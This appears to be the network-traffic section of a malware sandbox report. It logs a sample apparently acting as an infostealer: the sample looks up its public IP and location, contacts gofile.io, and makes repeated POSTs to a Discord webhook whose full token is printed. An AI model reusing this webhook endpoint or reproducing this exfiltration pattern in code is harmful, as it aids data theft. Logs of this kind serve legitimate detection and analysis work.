Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 412Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /getServer HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.189 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /getServer HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.10Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.189 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.10Connection: close

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: geolocation-db.com
Source: global traffic	DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Sun, 29 Dec 2024 19:02:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:45 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498966x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcL%2BFMVSqvz7tTWlR1tLkLu%2FDQ%2Fl8eYAC5HuxV02pNUQ8POQzbsss%2FBlTVxK8yPGstQWy0EK%2B1aWQIuS%2Bqlz4VQ7lPkN5t9btSJ2CGNxO19%2BPE%2FEgy9Reh12JnEs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=752684ca2b78c199a71dd5c30154bde0dc60dd85-1735498965; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=XhmKbEJ_SuzFm3Iztlh64DXx1CW.ahUwx.jYNEEE048-1735498965245-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0bd46897186d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:47 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498968x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijj83wKKUEjw1eJOyFtwhZNQmOqj9HRXXfRNuSeRihl30er6CwzKyVXN3gHaeFEPnR89HC3x6Irz8Zn73P%2BeUxNVjRqbcmD3FWl1yP561Dv%2BFP8zq6VJ2bbqVGk4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=623e6abcde00c142c2d5ec210b81eac86a32c704-1735498967; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Cvwb_4N.hYs5dxF6V._pzk.T9yYMRxkEpv5gtFAGey8-1735498967174-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0bdfd983f799-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498970x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjYK7ei2LslEHt9NpK8cOqf5VVqO2UDklNYjCRt9axGniT2h4jepUxEdmwvm8g%2Bxh4OFuQa2QEoIlyJCGv2DLbYhLFyoAbxAqjlZDsZVylzDEXIc6C26OAX5EU70"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=e06e93c4c3494c59fa4bbe37d00fe5a060aa4d80-1735498969; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=XzNxxMyL.p8r3sXfQzp3gH2Gg2XAaF3k9qJe.w3BVz0-1735498969224-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0bed4935c32e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498972x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiMzUe8TVFL4lL3nJ9UjVXgBsR5%2FhFrl8JCe1qpi9sL4DFn9SsFFvwgXF%2FlfIj2gitdZqqwUUw78EBAoy38PWra2dc2OKRq6noTCaiASfhr8hoCrfidyS86FeyUb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=e8824e005ef012f30576e98fe97ec33477a2f423-1735498970; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=VWwslk8gVncU7Dm.2sR8N8v.xq5HXr2aOHWezwSd8xk-1735498970952-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0bf819424363-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:52 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498974x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N0jmu9NXwWZ85CMmIVIoyXjzU6zIVXpkg%2BneiDJBGPJB%2Fwwn%2FYO22vfdTUgeYXwAtwtKA6bwuuaGYXSvimc1zEIhO%2BbVcyYt%2FjNitKXfSRkpECd4zG0TQ8ZfRrkV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=c6eb26ec5d97677dd755fecb35740d7b2c34999d-1735498972; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=oQSdn4_iWAC_tows86fMG9iRoQI2uWlRCf3T1PKS8G4-1735498972732-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c032acb43d3-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:54 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498975x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWM%2FrKfFzfzUP1Mfk5hyZNyIrqdG1utgWtPOPdVPptas%2FwCWT%2F4HVbSmJbX8APN5qLkO7r2s%2BkJvMoS4wFSdwnVrgBPGm7f2MalBto1cMr3oI%2Fl6btE0yOH6reWA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=0f05533984d6908e46ef45dac808328d15271110-1735498974; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=KuizxNPIEs1sXO4xGzStJLPpFyQ3ydTiq9rBC5PknGQ-1735498974462-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c0e0cb92363-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:56 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498977x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrTwFCXa13X6cxUjCVxMgDbeLom7Pd5hFLNP4VHJQ9wYZU80Xl%2BbyRoBNEYCPoX%2Fm0%2BL0zumAxCMjhyj3OIjnFmAJaBfJ48J7MSoQN61tF7pc9oZM5lLGCcmBHxY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5bc9eee408a1c59afa175019f5df8e545d23eacd-1735498976; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=QJiOEpyiyKF00rgd4cP8HoRM.bXp._pd8jS4T6xqcho-1735498976197-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c18cd81c47f-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Sun, 29 Dec 2024 19:02:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:02:58 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498979x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ETiIxRhaoy8vUUbljZfBQAxRuNk%2FBIUYJx0m4OAIv0JQUKW4TEFOUhP3oAVUOYRLUYNxuWsWfyNo8wdYhF9lN6lkSx%2BbMjqPi7h7aPsXrbPr82Pmn1xbzGH8FFhs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=118c5223e3186f6a9611a519377b96a1aa1193a4-1735498978; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=.s3GrcO_hePDmmDKu2vuMrbvaBJA9jDOrfBEm.98Wio-1735498978092-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c24bce40f7d-EWR
